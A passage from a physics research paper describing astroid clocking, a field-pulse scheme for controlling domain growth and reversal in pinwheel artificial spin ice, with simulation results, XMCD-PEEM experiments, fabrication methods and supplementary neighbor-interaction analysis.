**b**, switching astroids of the magnets in sublattice \(L_{a}\) (solid lines) and \(L_{b}\) (dashed lines), along with the four clock fields, \(\mathbf{H}_{A}\), \(\mathbf{H}_{B}\), \(\mathbf{H}_{a}\), and \(\mathbf{H}_{b}\). The astroid edges are colored according to the magnet state which is promoted when fields cross the edge. Similarly, the colored regions correspond to fields that _exclusively_ promote a magnet state within a sublattice. Astroid axes are normalized with respect to the hard axis switching threshold, \(h_{k}\). regions will address only magnets in \(L_{b}\). Furthermore, each region promotes a specific magnet state within each sublattice, e.g., a field in the blue shaded region promotes blue magnets by switching orange magnets. In this study, we define two _bipolar clocks_ A and B along the \(+22^{*}\) and \(-22^{*}\) axes, respectively. As shown in Fig. 1b, each clock consists of a positive and negative _clock field_ of magnitude \(H\) along the clock axis. The four arrows in Fig. 1b are colored according to the magnet states they promote, e.g., the \(\mathbf{H}_{A}\) field only promotes orange magnets. The dipolar fields \(\mathbf{h}_{\mathrm{dip}}\) from neighboring magnets may either promote or prevent switching. If the dipolar fields are directed out of (into) the astroid, they effectively promote (prevent) switching. A clock field can thus selectively address a subset of a sublattice, depending on the state of the ensemble. The clock angles \(\pm 22^{*}\) are selected to allow the dipolar fields to have a large influence on switching, using a field strength \(H\) close to the switching threshold. However, a precise angle is not crucial and the method tolerates a wide range of clock angles. Our system tolerates clock angles in the range \(10^{\circ}\) to \(35^{\circ}\), and field strengths accurate to \(3\,\mathrm{mT}\) to \(4\,\mathrm{mT}\). Fig. 2 illustrates astroid clocking, where a _clock pulse_ is defined as ramping a clock field from zero to \(H\) and down to zero again. The ramping speed is much slower than the timescale of nanomagnetic switching. A _clock protocol_ is a specific sequence of clock pulses. For example, \(AB\) clocking consists of repeated alternating clock pulses of \(A\) and \(B\). We define a _clock cycle_ as a single sequence of the clock pulses in a protocol, e.g., an \(aAbB\) clock cycle is the sequence of four pulses \((a,A,b,B)\). A _unipolar_ clock protocol exclusively employs one polarity of each clock, while a _bipolar_ clock protocol employs both polarities. ## 3 Unipolar clocking First, we explore the spin flip dynamics of pinwheel ASI when subject to the unipolar clock protocols \(AB\) and \(ab\). The \(50\times 50\) pinwheel ASI (5100 magnets) is initialized with a small rightwards (orange/pink) domain in the center of an otherwise leftwards polarized (blue/green) array. Fig. 3 (1) shows a closeup of the initial state. Figure 2: Clock diagram of astroid clocking. Clock protocols are defined by sequences of clock pulses. The clock diagram shows \(AB\) clocking (alternating pulses of the positive clock fields \(\mathbf{H}_{A}\) and \(\mathbf{H}_{B}\)) followed by \(ab\) clocking (alternating pulses of the negative clock fields \(\mathbf{H}_{a}\) and \(\mathbf{H}_{b}\)). Fig. 3 (2-8) shows the state evolution of the array subject to \(AB\) clocking, obtained from flatspin simulations (see Methods). 
As expected, the \(A\) pulse selectively switches magnets in sublattice \(L_{a}\) from blue to orange, while the \(B\) pulse selectively switches magnets in sublattice \(L_{b}\) from green to pink. Interestingly, the particular magnets that switch are the ones along the domain wall. As a result, the inner (leftwards) domain grows gradually over time, with only a thin layer of the domain advancing after each clock pulse. The growth is _monotonic_ and _step-wise_, driven by the clock pulses. A curious property is that the domain grows mainly in the horizontal direction. In Fig. 3 (2-8), the magnets along the vertical domain walls are the only ones to switch. If the growing domain reaches the edges of the array, the direction of growth changes and becomes vertical, eventually filling the entire array (Fig. 7). Inverting the clock pulses (\(ab\) clocking), will instead grow the outer (blue/green) domain and consequently shrink (reverse) the inner (orange/pink) domain. As can be seen in Fig. 3 (9-12), domain reversal from (8) proceeds in both vertical and horizontal directions, resulting in reversal of the inner domain in fewer clock cycles compared to growth. Hence there is an apparent _asymmetry_ in the direction of domain growth and reversal. Figure 3: Simulation of unipolar astroid clocking of pinwheel ASI in flatspin. Each snapshot shows a zoomed-in view of the \(50\times 50\) nanomagnet system, at different points during a clock protocol. (1) shows the initial state, a small orange/pink (rightwards) domain in the center of an otherwise polarized blue/green (leftwards) array. (2-8) show the state during \(AB\) clocking, resulting in gradual domain growth. (9-12) show the subsequent states during \(ab\) clocking, resulting in gradual domain reversal. Magnets that change state between snapshots are highlighted with a solid black outline. ## 4 Growth and reversal mechanism To understand the mechanism behind the domain growth and reversal, we consider the larger domain shown in Fig. 4c, subject to \(\mathbf{H}_{A}\). In Fig. 4a, we plot the relative locations of all the magnets within their respective switching astroids. Each dot represents the total field \(\mathbf{h}_{i}=\mathbf{H}_{A}+\mathbf{h}_{\mathrm{dip}}^{(i)}\) experienced by a magnet \(i\) in its _local frame of reference_. There are four clusters of dots within the astroids, corresponding to the four magnet colors, where only the blue magnets are close to switching. The internal structure of each astroid cluster is a result of the nanomagnet dipolar coupling, and a direct consequence of the ASI geometry. In the absence of dipolar fields, each cluster collapses into a single point. The dipolar fields add complex structure to the clusters, with sub-groups corresponding to different subsets of magnets within the ASI. For a detailed analysis of neighbor contributions, see Supplementary S1. The inset shown in Fig. 4b reveals the structure of the blue cluster. Notice there are a few blue dots that lie outside the astroid, corresponding to magnets that are eligible for switching, which are highlighted in Fig. 4c. Evidently, the switchable magnets all lie along the vertical and \(+45^{\circ}\) domain walls. When a magnet switches, its location within the astroid jumps to the cluster of opposite spin, e.g., a blue magnet switches to the orange state. In addition, neighboring magnets will see a change in the dipolar fields, causing movement within their respective clusters. 
In this way, the switching of a magnet may enable future switching in neighboring magnets, either during the current or a future clock pulse. Figure 4: Astroid clusters and astroid (black curve) for the pinwheel system shown in **c**, when subject to the clock field \(\mathbf{H}_{A}\). **a**, astroid cluster plot where each dot represents the total field \(\mathbf{h}_{i}=\mathbf{H}_{A}+\mathbf{h}_{\mathrm{dip}}^{(i)}\) experienced by a magnet \(i\), projected onto its parallel (\(h_{\parallel}\)) and perpendicular (\(h_{\perp}\)) axis. The colors in the plot correspond to magnet state. Note that the astroid plot shows location _relative_ to each magnet’s own switching threshold, e.g., orange magnets are far from switching as they are aligned with \(\mathbf{H}_{A}\). **b**, closeup of the blue cluster, revealing a sub-group of blue magnets that lie outside the switching astroid and are eligible for switching. These magnets are highlighted in **c**, and are all found to lie along the vertical and \(+45^{\circ}\) domain walls. The data is obtained from flatspin simulations. The observed horizontal domain growth can now be explained from the internal structure of the astroid clusters. We have seen that magnets along certain types of domain walls can be selectively switched under an applied clock field. Switching the blue (highlighted in Fig. 4c) magnets along these domain walls reverses their dipolar fields, which affects the structure of the green cluster. Consequently, green magnets that are part of the domain walls will approach the switching astroid. When the \(\mathbf{H}_{B}\) field is subsequently applied, these magnets will be outside the astroid and hence switch. As this cycle repeats, the result is an apparent horizontal domain growth emerging from the dipolar interactions and clock fields. During domain _reversal_, both horizontal and vertical domain walls take part in the process. As a result, reversal requires fewer clock cycles compared to growth. During reversal, the switchable magnets lie along both the horizontal, vertical and \(-45^{\circ}\) domain walls (Fig. 8). We find that the horizontal domain wall movement, particular to reversal, is dependent on the curvature of the reversing domain. If the horizontal domain wall is surrounded by a blue/green domain on three sides, there is a stronger dipolar "push" towards the astroid edge. As such, domain shape plays a crucial role in the reversal process. When a domain grows to reach the edges of the array, there is an apparent transition from horizontal to vertical growth (Fig. 7). We find that vertical growth proceeds by avalanches along the domain wall, starting at the bottom-left and top-right corners of the domain, close to the array edges. ## 5 Experimental growth and reversal Next, we demonstrate astroid clocking of pinwheel ASI experimentally. Samples are imaged with x-ray magnetic circular dichroism photoemission electron microscopy (XMCD-PEEM), with an in-situ vector magnet to perform astroid clocking. See Methods for details. After polarizing all magnets in the leftwards direction (bright contrast), we perform steps of \(AB\) clocking, imaging in-between each clock cycle. Fig. 5a shows total magnetization of the ensemble, obtained from the XMCD-PEEM images, which increases in a stable, monotonic fashion. Selected experiment snapshots are shown in Fig. 5b. Snapshots (1-3) show that domains nucleate at the vertical edges then predominantly expand horizontally. 
Domain formation at the _vertical_ array edges can be explained by the dipolar field-driven mechanism behind \(AB\) clocking. While domain nucleation along horizontal edges is possible, continued growth primarily occurs in the horizontal direction, preventing further expansion of horizontal edge nucleated domains. In any physical ASI system, the nanomagnets will exhibit a range of intrinsic switching thresholds, a _disorder_, due to imperfections and microscopic variations of material composition. Disorder affects both domain shape and growth dynamics, as evident in our experimental results. Compared to the idealized simulations, domains appear more organic, with distinct features such as jagged edges, slanted domain walls, and sporadic holes. In terms of dynamics, some domain borders get stuck for several clock cycles, while others advance more than one step during a single cycle (see Fig. 9). By introducing disorder to the simulations (see Methods), we obtain results that more closely resemble the experiment. The magnetization curve and snapshots from simulations _with disorder_ are included in Fig. 5. Notice how the simulated snapshots show organic-looking domains that resemble the domains of the experiment. After growth, we apply the reversal clock protocol, \(ab\) clocking. For each \(ab\) clock cycle, the magnetization reduces sharply, with domains shrinking more rapidly compared to the increase during growth. Comparing snapshot 3 and 4 of Fig. 5b, it is clear that the domains shrink in both vertical and horizontal directions. Figure 5: Results of growth and reversal with unipolar clock protocols, and control experiment. **a**, total magnetization of the ensembles subject to the different clock protocols. The timeline indicates clock time, labeled by the clock protocol. During \(AB\) clocking, the ensembles undergo growth and hence an increase in magnetization. The second phase, \(ab\) clocking, quickly reverses domains and total magnetization. The control experiment, consisting of separate \(A\) and \(B\) clock sequences, show no development of the domains. **b**, magnetic image snapshots (experiemental XMCD-PEEM images and flatspin simulated XMCD-PEEM contrast images) of the ensembles at the specified points in time. The depicted ensembles are approximately \(12.5\,\mathrm{\SIUnitSymbolMicro m}\times 12.5\,\mathrm{\SIUnitSymbolMicro m}\) (\(50\times 50\) pinwheel ASI, 5100 magnets). All XMCD-PEEM images are available in Figs. 9 and 10. Videos of the experiment and simulation are provided in Supplementary Videos 1 and 2. Next, we conduct a control experiment to verify that simply repeating a clock pulse \(A\) or \(B\) does not result in domain growth. After re-initializing the system, we apply several pulses of \(A\), then several pulses of \(B\), imaging after each pulse. As seen in Fig. 10 and the last part of Fig. 5a, only the first application of \(A\) or \(B\) results in growth. Growth progresses only when the type of clock pulse is changed, which confirms that the alternating pattern of \(A\) and \(B\) is what drives the observed domain growth. These experiments affirm the viability of astroid clocking in the face of experimental sensitivities (as low as \(<\)1 mT from Fig. 4) and potential impediments such as fabrication imperfections, temperature effects, and material degradation. While unstable individual magnets and inaccuracies in the image analysis induce some noise, it is negligible compared to the effect of astroid clocking. 
Experimental astroid clocking is surprisingly robust, demonstrating that it is possible to precisely control the spin flip dynamics of ASIs using global fields. ## 6 Bipolar clocking In bipolar clocking, each clock may be pulsed in both polarities. We consider two clock protocols illustrated in Fig. 11, namely \(aAbB\) and its inverse, \(AaBb\) clocking. In contrast to unipolar clocking, the magnetic fields in these bipolar clock protocols are balanced, i.e., the sum of all clock fields is zero. One might then expect that this results in a net zero magnetization change. On the contrary, bipolar clocking also results in domain growth and reversal, and a net change in magnetization. Fig. 6a plots the total magnetization of pinwheel ASI subject to bipolar clocking. As can be seen, \(aAbB\) clocking results in net domain growth, while \(AaBb\) clocking results in domain reversal. In contrast to unipolar clocking, bipolar clocking can also induce morphological changes to the growing domains. As a result of the bipolarity of the clock pulses, domains are now able to both grow and shrink within the same clock cycle. In the experiment snapshots of Fig. 6b, we observe growth from (1) to (2), followed by a clear change in domain morphology from (2) to (3), and further growth between (3) to (4). In simulations, we can observe the step-wise details of simultaneous growth and morphology changes, as shown in the zoomed in snapshots. Inverting the clock protocol (\(AaBb\) clocking) results in domain reversal. The deciding factor for growth or reversal is the polarity of the last clock pulse at the transition between the two clocks. Each clock in \(aAbB\) clocking, for example, ends on the positive polarity at the transition (\(aA\) and \(bB\)), resulting in growth of the rightwards (orange/pink) domains. Within a bipolar clock cycle, there is an apparent competition between growth and reversal. Some domain wall configurations result in net domain growth (others in net reversal), in a "one step back, two steps forward" process (see Supplementary S2). In this way, a domain may grow horizontally and reverse vertically, thereby gradually changing shape over time (see Fig. 12). While the balance between growth and reversal can be delicate, there is a clear trend for the clock protocols explored here, namely growth for \(aAbB\), and reversal for \(AaBb\). Compared to unipolar clocking, the dynamics in bipolar clocked pinwheel ASIs are more varied and complex. While there is a gradual net domain growth, the activity can intermittently spike and linger, depending on the particular state of the ensemble (see Supplementary Videos 3 and 4). Bipolar clocking hence unlocks a wide variety of complex dynamic behavior in pinwheel ASI, while at the same time offering considerable control by choice of clock protocol. Figure 6: Results of growth and reversal with bipolar clocking, and control experiment. **a**, total magnetization of the ensembles subject to the different bipolar clock protocols. The timeline indicates clock time, labeled by the clock protocol. During the first phase, \(AaBb\) clocking, the ensembles undergo domain growth and increase in magnetization. The controls, \(aA\) clocking and \(bB\) clocking, show no net growth. Further growth (\(aAbB\) clocking) and reversal (\(AaBb\) clocking) occur after the controls. **b**, magnetic image snapshots of the experimental ensemble, and zoomed in views of the flatspin simulated ensemble, at the specified points in time. 
The growing domains change morphology during the clock protocol. All XMCD-PEEM images are available in Supplementary Fig. 4. Videos of the experiment and simulation are provided in Supplementary Videos 3 and 4. ## 7 Conclusions We have introduced astroid clocking, a scheme for field-driven evolution in nanomagnetic metamaterials. The method exploits the shape and orientation of the nanomagnet switching astroids and dipolar coupling to selectively address subsets of the nanomagnets. Pulsing specific fields in sequence results in clocked dynamics that are both gradual and discrete in time. Considerable control of the dynamics is available through choice of clock protocol. This work demonstrates how astroid clocking can be used to control the growth and reversal of ferromagnetic domains in pinwheel ASI. In this system, unipolar clocking results in monotonic domain growth or reversal, while bipolar clocking adds more complex dynamics that include changes to domain morphology. The principles of astroid clocking are not limited to pinwheel ASI, and are applicable to a range of coupled nanomagnetic systems. Exploring the clocked dynamics of established and future nanomagnetic metamaterials is an exciting research direction. The space of possible clock protocols remains vast. Astroid clocking offers unprecedented control and understanding of ASI dynamics in both time and space. The method enables new directions in ASI research and paves the way for novel devices based on nanomagnetic metamaterials. ## 8 Extended data figures **Fig. 8 a-b**, astroid clusters during reversal, when the pinwheel system shown in **c** is subject to the negative clock field \(\mathbf{H}_{b}\). **b**, astroid clusters during reversal have a different structure compared to growth. Switchable magnets outside the astroid are highlighted in **c**. During reversal, the switchable magnets are along both the horizontal, vertical and \(-45^{*}\) domain walls. Switchable magnets along the horizontal domain wall is attributed to the curvature of the inner domain. Figure 9: XMCD-PEEM images of all steps from the relevant unipolar clock protocol series. Time starts at \(t=0\), and is incremented by 1 for each clock step, with clock pulses indicated by the labels. The black (rightwards) domains grow with application of \(AB\) clocking, and quickly reverses with \(ab\) clocking. Red circle highlights: The short, vertical domain wall terminating the black domain in the center region of snapshot \(t=20\) exemplifies both avalanching domain growth and a stuck domain wall. In snapshot \(t=21\) the top part of the domain wall has progressed in an avalanche to form a finger extension of the domain, while the bottom part of the domain wall remains as before. Figure 11: Clock diagram of bipolar \(aAbB\) clocking followed by its inverse, \(AaBb\) clocking. Bipolar clocking employs both positive and negative clock pulses. Figure 10: XMCD-PEEM images of the control experiment. The system is reinitialized at \(t=51\) (following from Fig. 9), and \(t\) is incremented by 1 for each clock step, with clock pulses indicated by the labels. The first \(A\) clock pulse promotes dark (rightwards) magnets, equivalent to half a clock cycle, while subsequent applications of \(A\) incurs no further change. When the clock pulse is changed to \(B\), dark (rightwards) magnets are again promoted, equivalent to the second half of an \(AB\) clock cycle. Furthermore, additional \(B\) clock pulses incurs no change in the state. 
Figure 12: Bipolar \(aAbB\) clocking of pinwheel ASI. Each snapshot shows a zoomed-in view of a \(50\times 50\) system, at different points during a clock protocol. (1) shows the initial state, an orange/pink (rightwards) domain in the center of an otherwise polarized blue/green (leftwards) array. (2-12) show the state during \(aAbB\) clocking, with simultaneous domain growth (horizontally) and reversal (vertically). As a result the domain gradually changes morphology over time. Magnets that change state between snapshots are highlighted by a solid black outline. ## Methods ### Sample fabrication details The samples are arrays of permalloy nanomagnets fabricated in pinwheel ASI geometries on a silicon substrate. The resist mixture, 1:2 CSAR 62:anisole, is spin-coated onto the substrate at 4000 rpm, achieving a thickness of \(\sim\)100 nm. Following coating, samples are soft baked at 150 C for 1 minute. The desired patterns, arrays of \(220\,\mathrm{nm}\times 80\,\mathrm{nm}\) stadium shaped nanomagnets in \(30\times 30\) and \(50\times 50\) pinwheel geometries, are then exposed using the Elionix ELS-G100 EBL system. Samples are post-exposure baked at 150 C for 1 minute. The patterned resist is developed using AR600-546 for 1 minute, rinsed with isopropanol, and nitrogen dried. Permalloy (Ni\({}_{0.79}\)Fe\({}_{0.21}\)) is deposited to a thickness of 25 nm via electron beam evaporation using a Pfeiffer Vacuum Classic 500 system, and capped with a 2 nm aluminium layer. Finally, the samples undergo ultrasound-assisted lift-off using a dedicated stripper (AR600-71), leaving behind the patterned permalloy nanomagnets. Post-fabrication, the precision and quality of the fabricated nanomagnet arrays are inspected using Scanning Electron Microscopy (SEM). This SEM inspection confirmed that the permalloy nanomagnets are properly formed, free-standing, and without significant defects. ### XMCD-PEEM and clocking procedure Experimentally realized clocking of fabricated ASIs is carried out under magnetic microscopy inspection. We use a photoemission electron microscope with x-ray magnetic circular dichroism (XMCD-PEEM) for magnetic contrast to observe single magnet states of the ASI ensembles[35]. An in-plane, bi-axial quadrupole magnet with two pairs of coils and a split 2D-yoke provides astroid clocking fields[36]. The signal at the Fe L\({}_{3}\) edge is exploited for ferromagnetic XMCD contrast. The orientation of the ASI ensembles, applied magnetic fields, and XMCD contrast is carefully selected. Samples are mounted with top and bottom ensemble edges parallel to the synchrotron light, with each nanomagnetic element oriented \(\pm 45^{\circ}\) to the light. This orientation guarantees balanced magnetic contrast for nanomagnets of both sublattices \(L_{a}\) and \(L_{b}\). The in-plane field direction is given relative to the incoming x-ray illumination, with angle values increasing counter-clockwise. Consequently, the field directions and ensemble orientation align with the illustration in Fig. 1, with an added light axis (providing magnetic contrast) parallel to the \(h_{x}\)-axis. The general experimental procedure is to initialize the ASI system, then apply clock protocols interspersed with magnetic imaging. We initialize the system by applying a strong, polarizing magnetic field (72 mT along 180), followed by two smaller fields, (18 mT along 0 and 3.5 mT along 180) to demagnetize the yoke. For the bipolar clocking, however, the initial field strength is 82 mT. 
The difference in field strength is due to observed differences in the ensemble coercivity. Successful initialization is confirmed by imaging a fully polarized ensemble (fully bright contrast (leftwards), as in snapshot \(t=0\) of Fig. 9) and the absence of remaining image translation in the PEEM (indicating a demagnetized yoke). After initialization, we perform steps of the clock protocols by alternating the application of clock pulses \(A\), \(B\), \(a\) or \(b\). Each _step_ of a clock protocol comprises at least one _clock pulse_ (ramping the applied field to \(\mathbf{H}_{i}\), holding the max field value, ramping down to zero applied field), and a magnetic contrast image acquisition. The value of \(H\) that defines the \(\mathbf{H}_{i}\) magnitudes is \(62\,\mathrm{mT}\) for the unipolar clocking, and \(75\,\mathrm{mT}\) for the bipolar clocking. After applying the first cycle of a clock protocol, before imaging, we shift the image, using the electron microscope optics, to re-center the ensemble, compensating for a small remanent magnetization in the yoke. We carry out multiple cycles, each consisting of applying clock pulses and capturing an image, while maintaining the same image shift throughout. In addition to the growth and reversal protocols, we conduct a control experiment by applying repeated clock pulses of \(A\) and \(B\) separately. ### flatspin simulations Numerical simulations were done using flatspin, a large-scale ASI simulator [33]. flatspin approximates each nanomagnet as a point dipole with position \(\mathbf{r}_{i}\) and orientation \(\theta_{i}\). Each dipole then has two possible magnetization directions along \(\theta_{i}\), i.e., a binary macrospin \(s_{i}\in\{-1,+1\}\). Each spin \(i\) is influenced by a total field \(\mathbf{h}_{i}=\mathbf{h}_{\mathrm{dip}}^{(i)}+\mathbf{h}_{\mathrm{ext}}^{(i )}+\mathbf{h}_{\mathrm{th}}^{(i)}\), where \(\mathbf{h}_{\mathrm{dip}}^{(i)}\) is the total dipolar field from neighboring magnets, \(\mathbf{h}_{\mathrm{ext}}^{(i)}\) is a global or local external field, and \(\mathbf{h}_{\mathrm{th}}^{(i)}\) is a stochastic magnetic field representing thermal fluctuations in each magnetic element. The total dipolar field is given by the magnetic dipole-dipole interaction, \[\mathbf{h}_{\mathrm{dip}}^{(i)}=\alpha\sum_{j\neq i}\frac{3\mathbf{r}_{ij}( \mathbf{m}_{j}\cdot\mathbf{r}_{ij})}{|\mathbf{r}_{ij}|^{5}}-\frac{\mathbf{m}_ {j}}{|\mathbf{r}_{ij}|^{3}}, \tag{1}\] where \(\mathbf{r}_{ij}=\mathbf{r}_{i}-\mathbf{r}_{j}\) is the distance vector from spin \(i\) to \(j\), and \(\alpha\) scales the dipolar coupling strength between spins. The coupling strength \(\alpha\) is given by \(\alpha=\frac{\mu_{0}M}{4\pi a^{3}}\), where \(a\) is the lattice spacing, \(M\) is the net magnetic moment of a single magnet, and \(\mu_{0}\) is the vacuum permeability. Nanomagnet switching (magnetization reversal) occurs if the total field is directed against the current magnetization \(\mathbf{m}_{i}\) and the magnitude of the field exceeds the coercive field \(h_{\mathrm{c}}\). flatspin employs a generalized Stoner-Wohlfarth model, where \(h_{\mathrm{c}}\) depends on the angle of the total field \(\mathbf{h}_{i}\) with respect to the magnet orientation. Associated with each magnet is a switching astroid, which describes \(h_{\mathrm{c}}\) in terms of the parallel (easy axis) and perpendicular (hard axis) component of the total field, \(\mathbf{h}_{\parallel}\) and \(\mathbf{h}_{\perp}\). 
The shape of the switching astroid is described by the equation \[\left(\frac{h_{\parallel}}{bh_{k}}\right)^{2/\gamma}+\left(\frac{h_{\perp}}{ ch_{k}}\right)^{2/\beta}=1, \tag{2}\] where \(h_{k}\) denotes the coercive field along the hard axis. The parameters \(b\), \(c\), \(\beta\), and \(\gamma\) adjust the shape of the astroid: \(b\) and \(c\) define the height and width, respectively, while \(\beta\) and \(\gamma\) adjust the curvature of the astroid at the easy and hard axis, respectively. Astroid parameters are typically tuned to obtain a shape that agrees with results from micromagnetic simulations. Fabrication imperfections are modelled as variation in the coercive fields \(h_{k}^{(i)}\), which are sampled from a normal distribution \(\mathcal{N}(h_{k},\sigma)\), where \(\sigma=k_{\text{disorder}}\cdot h_{k}\) and \(k_{\text{disorder}}\) is a user-defined parameter. Dynamics are modeled using a deterministic single spin flip strategy. At each simulation step, the total magnetic field \(\mathbf{h}_{i}\) is calculated. Next, we obtain a list of spins that _may_ flip, according to the switching astroid. Finally, the spin which is _furthest outside its switching astroid_ is flipped. The dipolar fields are recalculated after every spin flip, and the above process is repeated until there are no more flippable spins. This relaxation process is performed with constant external and thermal fields. In this work, a global external field is used (\(\mathbf{h}_{\text{ext}}^{(i)}=\mathbf{h}_{\text{ext}}\)), and thermal fluctuations are assumed to be negligible (\(\mathbf{h}_{\text{th}}^{(i)}=0\)). The coupling strength \(\alpha=0.0013\) was estimated to match the experimental results from the \(50\times 50\) fabricated pinwheel sample (see Methods). The value of \(\alpha=0.0013\) is lower than predicted by theory (\(\alpha\approx 0.0025\)), which is likely due to demagnetizing oxidation of the permalloy. A partially oxidized nanomagnet will have a reduced magnetic moment and a smaller effective size as the surface layer is no longer ferromagnetic. The smaller \(30\times 30\) sample used in Fig. 6 had a slightly larger magnet spacing and \(\alpha=0.0012\) was used in this case. For the simulation studies, a field strength \(H=76.5\,\mathrm{mT}\) and no disorder was used. Simulations accompanying the experimental results used a slightly lower field strength of \(H=75.8\,\mathrm{mT}\) for Fig. 5 and \(H=75.9\,\mathrm{mT}\) for Fig. 6. Switching parameters were estimated from micromagnetic simulations of a \(220\,\mathrm{nm}\times 80\,\mathrm{nm}\times 25\,\mathrm{nm}\) stadium magnet using mumax[37], namely \(h_{k}=0.2\,\mathrm{T}\), \(b=0.38\), \(c=1\), \(\beta=1.3\), and \(\gamma=3.6\) Other parameters include \(k_{\text{disorder}}=4\%\) and a neighbor distance of 10. ## Supplementary information ### Neighborhood interactions Here we analyse what type of neighbor interactions causes switching to occur selectively along the vertical and \(+45^{\circ}\) domain walls. We consider five different prototype cases shown in Supplementary Fig. 1c: a uniform blue/green (leftwards) domain, and two domains separated by horizontal, vertical, and \(\pm 45^{\circ}\) domain walls (DWs). Within each prototype case, the subject of study is the highlighted blue magnet in the center. The circled insets in the figure show only a limited neighborhood in the center of a larger \(50\times 50\) system which is initialized according to each prototype case. Supplementary Fig. 
1a plots the distance to the astroid for the center magnet, as the number of neighbors are increased when calculating the dipolar fields. In other words, we compute the total dipolar field from all magnets within a radius of the Nth nearest neighbor (NN). After adding the total dipolar field to the external clock field \(H_{A}\), the shortest distance to the astroid is calculated. We define astroid distance as positive outside the astroid and negative inside. Astroid distance is plotted for each of the five prototype cases in Supplementary Fig. 1c. With zero neighbors, and hence no dipolar fields, all five cases start at the same point outside the astroid. As the first NNs are included, the cases split into four: the uniform domain and the \(-45^{\circ}\) domain wall enter the astroid. In other words, the dipolar fields from the first NNs stabilize and prevent switching in these two cases. Including also the second NNs causes the horizontal domain wall to enter the astroid. Horizontal domain walls are hence stabilized by 2nd NN interactions. For the Figure 1: Minimum distance to the astroid edge as the neighborhood is increased, for the highlighted blue magnet in the center of each scenario in **c**. In all cases, the clock field \(\mathbf{H}_{A}\) is applied. **a**, distance to the astroid for the highlighted magnet, as the neighborhood is increased when calculating the dipolar fields. **b**, shows a trace of the position within the astroid as the neighborhood is increased. Note that the scenarios all start at the same point (no neighbors), then diverge. horizontal and \(-45^{\circ}\) domain walls, astroid distance does not change significantly as the neighborhood is increased further. For the uniform domain, however, astroid distance increases further as the number of NNs are increased, with significant stabilizing interactions also beyond 9NNs. Next, we consider the two cases where switching _does_ occur, namely the vertical and \(+45^{\circ}\) domain walls. Somewhat curious, the astroid distance for the vertical domain wall appears to stay nearly constant across all NNs. The \(+45^{\circ}\) domain walls travel further outside the astroid due to 1st NN interactions, then the 3rd NN interactions bring it closer to the astroid again, after which it remains at a near-constant distance. Supplementary Fig. 1b shows a trace of the location within the astroid as the NNs are increased. For the vertical domain wall (red line), there is indeed movement due to dipolar interactions, but the movement is exclusively _parallel_ to the astroid edge. Hence, the astroid distance in this case remains constant. For the \(+45^{\circ}\) domain wall (purple line), the movement is purely in the perpendicular (\(h_{\perp}\)) direction for the 1st NN interactions, then purely parallel (\(h_{\parallel}\)) from the 3rd NN fields. An even more detailed picture is provided in Supplementary Fig. 2, where each neighbor magnet is colored according to the contribution of its dipolar field. Specifically, a magnet is colored red (blue) if its dipolar field pushes the center magnet further out of (into) the astroid. The shade of red (blue) represents how much the dipolar field contributes to promote (prevent) switching of the center magnet. A magnet is colored white if its dipolar field has no contribution on the resulting astroid distance. As can be seen in Supplementary Fig. 
2, the neighborhood in the uniform domain is dominated by magnets that prevent switching (colored blue), with the highest contribution from the first NNs along the hard axis of the center magnet. The same subset of the NNs are also the primary stabilizing force of the \(-45^{\circ}\) DW. For the horizontal DW case, the dipolar fields from the first NNs cancel out, and it is the second NNs that prevent switching. Figure 2: Neighborhood influence with respect to center magnet. Each scenario depicts the magnetization state (top) and the corresponding influence of the neighbors (bottom). Stronger red signifies that the magnet is biasing the center magnet _towards_ switching, and stronger blue signifies that the magnet is biasing the center magnet _away_ from switching. For the vertial DW, there is an apparent symmetry between neighbors that prevent and promote switching. As a result the vertical DW is not stabilized and hence easily switched. We saw earlier how this is because the dipolar fields are directed parallel to the astroid edge. The \(+45^{\circ}\) DW is the least stable, where \(3/4\) of the first NNs promote switching (colored red). ### Growth and reversal in bipolar clocking During bipolar clocking, domain growth and reversal in a single clock cycle can be observed for several domain wall configurations. Supplementary Fig. 3 shows the time evolution of different types of domain walls, subject to \(aAbB\) clocking. A straightforward example of simultaneous growth and reversal can be seen in Supplementary Fig. 3d, which shows a \(+45^{\circ}\) domain wall. Notice that the first clock pulse \(a\) moves the domain wall one step towards the left, and hence a reversal of the orange/pink domain. However, the subsequent \(A\) pulse immediately undoes this change _and_ moves the domain wall another step towards the right, advancing the domain wall a total of two layers of the sublattice \(L_{a}\) (orange magnets). Next, the \(b\) pulse has no effect, since the pink magnets along the domain wall are stabilized by the dipolar fields from their neighbors. Finally, the \(B\) pulse moves the domain another step towards the right, flipping the next layer of magnets from sublattice \(L_{b}\) (from green to pink). As can be seen, the result is an apparent growth of the orange/pink domain by a single layer along the domain wall. The other domain wall cases in Supplementary Fig. 3 also show simultaneous growth and reversal, but are not discussed in further detail. There is an apparent competition between growth and reversal. For the \(+45^{\circ}\) domain wall discussed earlier, the competition seems to favor growth. However, the situation strongly depends on the particular shape of the domain. Fig. 12 (main text) Figure 3: Bipolar \(aAbB\) clocking of four types of domain walls in pinwheel ASI: **a**, horizontal DW, **b**, vertical DW, **c**, \(-45^{\circ}\) DW and **d**, \(+45^{\circ}\) DW. Each domain wall is initialized to fill the whole \(50\times 50\) system from edge to edge. Each snapshot shows a zoomed-in view of the system, at different points during a clock protocol. (1) shows the initial state. (2-12) show the state during \(aAbB\) clocking. Magnets that change state between snapshots are highlighted by a solid black outline. shows the time evolution of a hexagonal domain subject to \(aAbB\) clocking. As can be seen, the domain both grows horizontally and reverses vertically, and hence gradually changes shape over time. 
Since vertical domain reversal depends on the curvature of the domain, the process will stop when the domain grows too wide. The domain will continue to grow horizontally, as horizontal domain growth is not dependent on curvature. As a result, domain growth seems to out-compete reversal in this case. The end result is an apparent tendency towards horizontally elongated domains. Figure 4: XMCD-PEEM images of all steps from the bipolar clock protocol series. The time starts at \(t=0\), and is incremented by 1 for each image, with clock pulses indicated by the labels. The black (rightwards) domains grow and change shape as the \(aAbB\) protocol is applied. There are two control series where \(aA\) and \(bB\) are applied, where no change occurs. Note that there is missing data for \(t=33\), but the ensemble was still subjected to the clock pulses. At \(t=39\) we image after each single clock pulse. From \(t=42\) the reverse protocol \(BbAa\) is applied, and the black (rightwards) domains shrink. Note that during the reversal protocol we still image after a final \(A\) or \(B\) pulse, in order to keep a constant image shift. ## S3 Videos **Video 1** Video showing all XMCD-PEEM images from the unipolar clock protocol series. Each frame is labeled by the clock pulse(s) preceding it. The series consists of growth, reversal, re-initialization, control experiment and a second phase of growth. **Video 2** Video showing flatspin simulation of the unipolar clock protocol series. Each frame depicts the clock pulse preceding it. The series consists of growth, reversal, re-initialization and control experiment. **Video 3** Video showing all XMCD-PEEM images from the bipolar clock protocol series. Each frame is labeled by the clock pulse(s) preceding it. The series consists 